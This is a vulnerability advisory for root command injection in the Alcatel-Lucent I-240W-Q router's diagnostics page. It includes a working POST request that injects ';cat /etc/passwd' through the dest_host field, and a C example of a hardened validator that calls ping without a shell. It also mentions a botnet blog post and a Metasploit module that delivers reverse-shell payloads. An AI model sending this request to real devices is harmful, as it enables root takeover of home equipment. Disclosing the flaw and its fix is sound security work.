Arbitrary Command Execution in Alcatel-Lucent I-240W-Q
The ONT Alcatel-Lucent I-240W-Q is vulnerable to arbitrary command execution in the administrative web interface.
Model: Alcatel Lucent I-240W-Q
The vulnerability is located in the administrative web interface under Maintenance > Diagnostics. The IP Address value for the Ping and Traceroute commands is not properly filtered, which allows multiple system commands to be run through the use of the ";" character.
The commands run with root privileges.
POST /GponForm/diag_XForm HTTP/1.1
Host: 192.168.1.254
Referer: http://192.168.1.254/diag.html
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=%3Bcat+%2Fetc%2Fpasswd

HTTP/0.9 200 OK
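A hardened handler for the dest_host field described above, as an added example (not the vendor's firmware code, which this page does not show): the value must parse as an IP literal or a hostname, and ping is started from an argv array so no shell ever interprets it. The function names and the ping arguments are assumptions.

```c
#include <arpa/inet.h>
#include <ctype.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical validator: accept only an IPv4/IPv6 literal or an RFC 1123
 * hostname. ';', '|', '$', spaces and a leading '-' are all rejected. */
int dest_host_is_valid(const char *h)
{
    unsigned char addr[sizeof(struct in6_addr)];
    size_t len = h ? strlen(h) : 0, label = 0;

    if (len == 0 || len > 253)
        return 0;
    if (inet_pton(AF_INET, h, addr) == 1 || inet_pton(AF_INET6, h, addr) == 1)
        return 1;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)h[i];
        if (c == '.' && label > 0 && h[i - 1] != '-')
            label = 0;                      /* label ended cleanly */
        else if ((isalnum(c) || (c == '-' && label > 0)) && label < 63)
            label++;
        else
            return 0;
    }
    return label > 0 && h[len - 1] != '-';
}

/* Hypothetical handler: the validated value is one argv element. Returns
 * ping's exit status, or -1 if the input is rejected or ping cannot run. */
int run_ping(const char *host)
{
    int status;
    pid_t pid;
    if (!dest_host_is_valid(host) || (pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        execlp("ping", "ping", "-c", "4", host, (char *)NULL);
        _exit(127);
    }
    return (waitpid(pid, &status, 0) == pid && WIFEXITED(status))
               ? WEXITSTATUS(status) : -1;
}

int main(void)
{   /* The dest_host value from the request above, URL-decoded. */
    return run_ping(";cat /etc/passwd") == -1 ? 0 : 1;
}
```

Because the validator also rejects values that begin with "-", a submitted value cannot be read by ping as an option.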
BLOG POST: Drive By ONT Botnet with IRC C&C
The blog post demonstrates the creation of a botnet using embedded devices which are controlled remotely through vulnerabilities exploited from a webpage.
This MSF exploit was created by Luis Colunga to execute remote reverse TCP MIPS payloads by exploiting a command execution vulnerability found in the ONT Alcatel Lucent I-240W.